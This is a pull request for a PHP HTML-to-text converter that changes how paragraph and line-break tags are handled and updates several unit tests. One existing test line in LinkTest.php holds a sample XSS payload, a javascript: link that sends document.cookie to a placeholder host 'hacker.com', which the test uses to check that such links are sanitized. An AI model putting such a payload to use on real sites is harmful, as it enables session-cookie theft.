### PR TITLE
Treat all paragraph content equally (Fixes #7)

### DIFF
--- a/src/Html2Text.php
+++ b/src/Html2Text.php
@@ -50,8 +50,6 @@ class Html2Text
         '/<head[^>]*>.*?<\/head>/i',                      // <head>
         '/<script[^>]*>.*?<\/script>/i',                  // <script>s -- which strip_tags supposedly has problems with
         '/<style[^>]*>.*?<\/style>/i',                    // <style>s -- which strip_tags supposedly has problems with
-        '/<p[^>]*>/i',                                    // <P>
-        '/<br[^>]*>/i',                                   // <br>
         '/<i[^>]*>(.*?)<\/i>/i',                          // <i>
         '/<em[^>]*>(.*?)<\/em>/i',                        // <em>
         '/(<ul[^>]*>|<\/ul>)/i',                          // <ul> and </ul>
@@ -82,8 +80,6 @@ class Html2Text
         '',                              // <head>
         '',                              // <script>s -- which strip_tags supposedly has problems with
         '',                              // <style>s -- which strip_tags supposedly has problems with
-        "\n\n",                          // <P>
-        "\n",                            // <br>
         '_\\1_',                         // <i>
         '_\\1_',                         // <em>
         "\n\n",                          // <ul> and </ul>
@@ -137,6 +133,8 @@ class Html2Text
      */
     protected $callbackSearch = array(
         '/<(h)[123456]( [^>]*)?>(.*?)<\/h[123456]>/i',           // h1 - h6
+        '/[ ]*<(p)( [^>]*)?>(.*?)<\/p>[ ]*/si',                  // <p> with surrounding whitespace.
+        '/<(br)[^>]*>[ ]*/i',                                    // <br> with leading whitespace after the newline.
         '/<(b)( [^>]*)?>(.*?)<\/b>/i',                           // <b>
         '/<(strong)( [^>]*)?>(.*?)<\/strong>/i',                 // <strong>
         '/<(th)( [^>]*)?>(.*?)<\/th>/i',                         // <th> and </th>
@@ -511,6 +509,17 @@ class Html2Text
     protected function pregCallback($matches)
     {
         switch (strtolower($matches[1])) {
+            case 'p':
+                // Replace newlines with spaces.
+                $para = str_replace("\n", " ", $matches[3]);
+
+                // Trim trailing and leading whitespace within the tag.
+                $para = trim($para);
+
+                // Add trailing newlines for this para.
+                return "\n" . $para . "\n";
+            case 'br':
+                return "\n";
             case 'b':
             case 'strong':
                 return $this->toupper($matches[3]);

--- a/test/BasicTest.php
+++ b/test/BasicTest.php
@@ -19,6 +19,57 @@ class BasicTest extends \PHPUnit_Framework_TestCase
                 'html'      => '0',
                 'expected'  => '0',
             ),
+            'Paragraph with whitespace wrapping it' => array(
+                'html'      => 'Foo <p>Bar</p> Baz',
+                'expected'  => "Foo\nBar\nBaz",
+            ),
+            'Paragraph text with linebreak flat' => array(
+                'html'      => "<p>Foo<br/>Bar</p>",
+                'expected'  => <<<EOT
+Foo
+Bar
+
+EOT
+            ),
+            'Paragraph text with linebreak formatted with newline' => array(
+                'html'      => <<<EOT
+<p>
+    Foo<br/>
+    Bar
+</p>
+EOT
+                ,
+                'expected'  => <<<EOT
+Foo
+Bar
+
+EOT
+            ),
+            'Paragraph text with linebreak formatted whth newline, but without whitespace' => array(
+                'html'      => <<<EOT
+<p>Foo<br/>
+Bar</p>
+EOT
+                ,
+                'expected'  => <<<EOT
+Foo
+Bar
+
+EOT
+            ),
+            'Paragraph text with linebreak formatted with indentation' => array(
+                'html'      => <<<EOT
+<p>
+    Foo<br/>Bar
+</p>
+EOT
+                ,
+                'expected'  => <<<EOT
+Foo
+Bar
+
+EOT
+            ),
         );
     }
 

--- a/test/BlockquoteTest.php
+++ b/test/BlockquoteTest.php
@@ -20,11 +20,12 @@ HTML symbols &amp;
 EOT;
 
         $expected =<<<'EOT'
-Before 
+Before
 
 > Foo bar baz HTML symbols &
 
 After
+
 EOT;
 
         $html2text = new Html2Text($html);

--- a/test/HeaderTest.php
+++ b/test/HeaderTest.php
@@ -14,6 +14,7 @@ EOT;
 WILL BE UTF-8 (ÄÖÜÈÉИЛČΛ) UPPERCASED
 
 Will remain lowercased
+
 EOT;
 
         $html2text = new Html2Text($html);

--- a/test/LinkTest.php
+++ b/test/LinkTest.php
@@ -69,12 +69,13 @@ EOT;
 EOT;
 
         $expected =<<<EOT
-Link text 
+Link text
 
-Link text [http://example.com] 
+Link text [http://example.com]
 
 Link text
 [http://example.com]
+
 EOT;
 
         $html2text = new Html2Text($html);
@@ -124,7 +125,7 @@ EOT;
 
         $this->assertEquals($expected, $html2text->getText());
     }
-		
+
     public function testJavascriptSanitizing()
     {
         $html = '<a href="javascript:window.open(\'http://hacker.com?cookie=\'+document.cookie)">Link text</a>';

--- a/test/PreTest.php
+++ b/test/PreTest.php
@@ -20,13 +20,14 @@ HTML symbols &amp;
 EOT;
 
         $expected =<<<'EOT'
-Before 
+Before
 
 Foo bar baz
 
 HTML symbols &
 
 After
+
 EOT;
 
         $html2text = new Html2Text($html);


### PR DESCRIPTION
The content of paragraph tags should be treated equally. That is to say that
whitespace within the tag (newline, and spaces) should be compressed before
the tag is treated.